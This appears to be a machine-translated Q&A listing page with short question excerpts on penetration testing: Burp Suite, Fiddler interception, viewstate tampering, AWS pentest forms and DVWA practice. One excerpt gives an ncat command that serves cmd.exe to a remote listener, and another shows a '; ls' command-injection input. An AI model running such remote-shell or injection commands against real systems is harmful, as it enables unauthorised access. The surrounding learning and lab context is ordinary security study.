penetration-testing

    0

    1答えて

    保存されたプロジェクトをburpスイート無料版で読み込む方法

    WebアプリケーションでPENテストを検証するためにBurp Suite Free Editionを使用しています。 自分のプロジェクトを私のローカルに保存し、バンプスイートを閉じました。 私はげっぷスイートを立ち上げ、プロジェクトがロードされません Burp >> Project options >> Load Project options. 経由で保存したプロジェクトをロードしてみてくだ
    security penetration-testing burp penetration-tools 2017-06-16

    -1

    1答えて

    Ncatは接続してすぐにWindowsでコマンドを実行します

    リッスンするLinuxマシンからnetcat接続を開き、対象のWindowsマシン(例:dirまたはipconfig)ですぐにコマンドを実行する方法を見つけようとしています。 これに似た何か:私はすぐに、すぐに接続がWindowsで行われるようにコマンドを実行する必要が ncat 192.168.1.25 4444 -e cmd.exe : のLinuxマシン: nc -lvp 4444; d
    linux bash networking netcat penetration-testing 2017-03-16

    0

    1答えて

    Webアプリケーションでビューステートデータを操作する方法は?

    出席依頼ページであるWebアプリケーションをテストしています。機能性は、2人のユーザーが同じ出席者を更新した場合、最新の変更を加えた変更の警告を表示することです。 これは、ビューステートに保存されていないテキストボックスに入力する値を保存するようなロジックを実装しています。ビューステート、現在のデータ、データベースデータの値を比較し、変化する。 テストの一環として、開発者がビューステートに格納する
    security testing penetration-testing 2017-05-09

    0

    1答えて

    HTTPSの傍受要求をクリアテキストで取得することはバグです

    私は携帯電話のアンドロイドアプリのHTTPS要求をペンテスト目的でFiddler経由で傍受しています。私はAndroidの携帯電話にフィドラー証明書をインストールしているので、HTTPSリクエストを傍受することができます。 私の質問は、自分の電話機からのHTTPS要求をFiddlerの平文で見ることができます。だから、それはアンドロイドアプリのバグですか、それとも普通のテキストでHTTPSリクエス
    request fiddler intercept penetration-testing 2017-08-16

    0

    2答えて

    バイナリをPythonの文字列にキャストする方法

    infosecプロジェクトでは、文字列をバイト配列の一種として使用しています。これは一般に脆弱性テストで行われます。バイト配列を構築する際に、印刷可能な文字と印刷できない文字を連結したい。 これは変換の問題ではなく、実際にその型をキャストしたいと考えています。私は関数やメソッドをchr()の周りに書くことができますが、より良い方法が必要です。 >>> print "A"*10 + chr(0x20
    python python-2.7 casting penetration-testing 2017-08-20

    0

    1答えて

    侵入テスト用のツールとプログラミング言語

    Javaアプリケーションの侵入テストについて、どのツールやプログラミング言語で知っておくべきか尋ねます。 私は特にPythonを求めています。 Pythonの代わりにjythonが侵入テストに使用できますか?あなたはペンのテスト 2.ZAPプロキシのすべての段階のためのツールを持っている 1.KaliのLinux OSを試すことのツールについては
    java python java-ee jython penetration-testing 2017-03-26

    0

    1答えて

    <<< printfを使ってLinuxシェルで複数のコマンドを標準出力する方法

    DVWAの高レベルコマンドインジェクションを使って運動しています。私は|用の穴があるけど、私は次のような出力を取得する方法を探しています: [email protected]:~# ping -c 4 10.0.0.1 ; ls PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data. --- 10.0.0.1 ping statistics --- 4
    bash stdin code-injection penetration-testing 2017-02-05

    0

    1答えて

    Amazon EC2侵入リクエストフォーム

    私はAmazon Webサービスに侵入リクエストフォームを作成しています。私は、リクエストフォームを記入するのに役立つ、私は動的IPを持っている、宛先IPとソースIPで何を言及しますか? サーバがAWS EC2にデプロイされ、Ubuntu 12.02 OSが実行されています。 dbはAWS RDSを使用して別のインスタンスにあります。負荷分散なし - アプリケーション用の単一のサーバーインスタンス
    amazon-web-services amazon-ec2 penetration-testing 2017-03-27

    -3

    1答えて

    androidの侵入テストアプリを作成する

    侵入テストアプリを作成する予定です。アプリはアンドロイドデバイスにインストールされているすべてのアプリを一覧表示し、アプリでアプリを選択すると、アンドロイド携帯端末でそのアプリの分析を行う必要があります。 私はこれを行うことができます任意のフレームワークやツールはありますか?
    android testing penetration-testing 2017-07-21

    1

    1答えて

    burp suiteを使用してユーザー情報を取得する

    私はWeb pentestingの初心者です。質問があります。お勧めします 私はhttps urlを持っており、私はすべてのhttpリクエストをburpプロキシ設定でアクセスするように設定しました。一般的なケースでは、firefoxのようなクライアントからurlにアクセスしている場合、複数のドメインに対してセキュリティ例外が発生する可能性があることがわかっており、それぞれにセキュリティ例外を追加す
    penetration-testing burp 2017-02-26
最新の質問